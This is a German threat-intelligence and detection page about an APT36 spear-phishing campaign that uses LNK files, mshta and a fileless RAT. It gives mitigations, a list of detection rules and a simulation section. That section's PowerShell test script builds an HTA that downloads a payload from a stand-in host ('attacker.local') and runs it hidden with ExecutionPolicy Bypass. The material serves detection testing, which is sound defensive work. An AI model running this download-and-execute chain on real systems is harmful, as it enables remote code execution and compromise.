APT36: Mehrstufige LNK-Malware-Kampagne, die sich gegen indische Regierungseinrichtungen richtet
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
APT36 (Transparent Tribe) führte eine Spear-Phishing-Kampagne durch, die eine bösartige LNK-Verknüpfung lieferte, die sich als PDF tarnt. Beim Öffnen startet die Verknüpfung mshta.exe um einen HTA-basierten Loader auszuführen, der Payloads im Speicher entschlüsselt und ausführt, einschließlich eines Konfigurationsmoduls und einer voll ausgestatteten RAT-DLL. Die Malware wählt dynamisch Persistenzmethoden basierend auf dem installierten Antivirenprodukt des Opfers und verbindet sich mit ihrem Command-and-Control-Server über einen verschlüsselten Kanal. Die Aktivität wird als spionagefokussiert bewertet, zielt auf indische Regierungs- und Bildungseinrichtungen ab, um Daten zu stehlen.
Untersuchung
Forscher analysierten die ungewöhnlich große LNK-Datei, verfolgten den eingebetteten HTA-Inhalt gehostet auf innlive.in, und reverse-engineerten die Entschlüsselungslogik. Die Kette offenbarte zwei primäre Phasen: eine .NET-Deserialisierungs-Payload, die genutzt wird, um Sicherheitsprüfungen zu schwächen oder zu umgehen, gefolgt von einer fileless bösartigen DLL (z.B. ki2mtmkl.dll / iinneldc.dll) mit RAT-Funktionalität. Persistenzverhalten wurde auf spezifische Antivirenprodukte abgebildet und wichtige C2-Details wie TCP-Port 8621 und ein AES-Schlüssel der für verschlüsselten Verkehr verwendet wird, wurden während der Analyse extrahiert.
Minderung
Einschränken oder Quarantäne von Verknüpfungs-(.lnk) Anhängen, die per E-Mail geliefert werden, insbesondere wenn sie in ZIP-Archiven gepackt sind. Anwendungssteuerungsrichtlinien anwenden, um die Ausführung von mshta.exe, PowerShell und anderen Skript-Engines von benutzerbeschreibbaren Pfaden aus zu begrenzen. Verwenden Sie Endpunkt-Erkennungen für Prozessketten, die mshta.exe und Anzeichen von In-Memory-DLL-Ausführungen beinhalten, und strenge Egress-Kontrollen durchsetzen, um Kommunikation mit unbekannten oder nicht vertrauenswürdigen Domains zu blockieren.
Reaktion
Wenn eine verdächtige LNK-Ausführung entdeckt wird, isolieren Sie das System, erfassen Sie Speicherabbilder und suchen Sie nach In-Memory-DLL-Indikatoren, die mit der RAT-Phase verbunden sind. Blockieren Sie identifizierte bösartige Domains und damit verbundene IP-Infrastrukturen, und rotieren Sie möglicherweise exponierte Anmeldedaten. Führen Sie eine forensische Überprüfung durch, um Persistenzartefakte im Startordner und in der Registry zu finden, entfernen Sie diese und validieren Sie, dass keine zusätzlichen Zugangspunkte verbleiben.
Angriffsfluss
Erkennungen
Mögliches bösartiges LNK-File mit doppelter Erweiterung (via cmdline)
Anzeigen
Verdächtiges LOLBAS-MSHTA-Tarnverhalten durch Erkennung assoziierter Befehle (via process_creation)
Anzeigen
Verdächtige Binärdateien / Skripte am Autostart-Ort (via file_event)
Anzeigen
Verdächtige Dateien im öffentlichen Benutzerprofil (via file_event)
Anzeigen
Verdächtige Ausführung aus öffentlichem Benutzerprofil (via process_creation)
Anzeigen
IOCs (SourceIP) zur Erkennung: APT36: Multi-Stage-LNK-Malware-Kampagne, die indische Regierungseinrichtungen ins Visier nimmt
Anzeigen
IOCs (HashSha256) zur Erkennung: APT36: Multi-Stage-LNK-Malware-Kampagne, die indische Regierungseinrichtungen ins Visier nimmt
Anzeigen
IOCs (DestinationIP) zur Erkennung: APT36: Multi-Stage-LNK-Malware-Kampagne, die indische Regierungseinrichtungen ins Visier nimmt
Anzeigen
Ausführung von mshta.exe mit PowerShell oder CMD [Windows-Prozesserstellung]
Anzeigen
APT36 Bösartiger Domain- und C2-Kommunikationserkennungen [Windows Netzwerkverbindung]
Anzeigen
Erkennung des hart codierten AES-Schlüssels in APT36-Kampagne [Windows Sysmon]
Anzeigen
Simulationsausführung
Voraussetzung: Der Telemetrie- und Basislinien-Preflight-Check muss bestanden haben.
Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der gegnerischen Technik (TTP), die entwickelt wurde, um die Erkennungsregel auszulösen. Die Befehle und die Erzählung MÜSSEN die identifizierten TTPs direkt widerspiegeln und zielen darauf ab, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird.
-
Angriffs-Narrativ & Befehle:
Ein Angreifer hat niedrigprivilegierten PowerShell-Zugriff auf eine kompromittierte Arbeitsstation erlangt. Um eine Remote-Payload auszuführen, ohne ein ausführbares Programm auf die Festplatte zu schreiben, verwendet der Angreifermshta.exeum eine HTA-Datei auszuführen, die eine PowerShell-Hintertür von einem C2-Server zieht. Die Schritte sind:- Ein minimales bösartiges HTA kodieren, das PowerShell startet, um eine Payload herunterzuladen und auszuführen.
- Hosten Sie das HTA auf einem Webserver (z.B.
http://attacker.local/malicious.hta). - Rufen Sie von der kompromittierten PowerShell-Sitzung
mshta.exemit der Remote-URL als Argument auf.
Diese Kette erzeugt ein Prozesserstellungs Ereignis, bei dem
mshta.exedas Kind vonpowershell.exeist, und es passt genau zur Sigma-Regel. -
Regressionstest-Skript:
#------------------------------------------------- # Simulierter Angreifer-Skript – löst die Regel aus #------------------------------------------------- # 1. Definieren Sie das bösartige HTA (inline für Demonstrationszwecke) $htaContent = @" <script> // Laden und führen Sie eine Dummy-PowerShell-Payload aus var url = 'http://attacker.local/payload.ps1'; var xhr = new ActiveXObject('Microsoft.XMLHTTP'); xhr.open('GET', url, false); xhr.send(); var ps = new ActiveXObject('WScript.Shell'); ps.Run('powershell -NoProfile -ExecutionPolicy Bypass -Command "' + xhr.responseText + '"', 0, false); </script> "@ # 2. Schreiben Sie HTA an temporären Ort (simuliert eine gehostete Datei) $tempPath = "$env:TEMPmalicious.hta" $htaContent | Set-Content -Path $tempPath -Encoding ASCII # 3. Starten Sie mshta.exe von PowerShell aus (der Erkennungs-Trigger) $mshta = (Get-Command mshta.exe).Source Write-Host "[*] Starten von mshta.exe zur Ausführung der HTA-Payload..." Start-Process -FilePath $mshta -ArgumentList "`"$tempPath`"" -NoNewWindow # Optional: Schlaf, um das Ereignis erfassen zu lassen Start-Sleep -Seconds 5 # Bereinigung (wird im nächsten Abschnitt behandelt) -
Bereinigungskommandos:
# Entfernen Sie temporäre HTA-Datei Remove-Item -Path "$env:TEMPmalicious.hta" -Force -ErrorAction SilentlyContinue # Stoppen von eventuell noch laufenden mshta.exe-Prozessen (unwahrscheinlich nach normaler Ausführung) Get-Process -Name mshta -ErrorAction SilentlyContinue | Stop-Process -Force Write-Host "[*] Bereinigung abgeschlossen."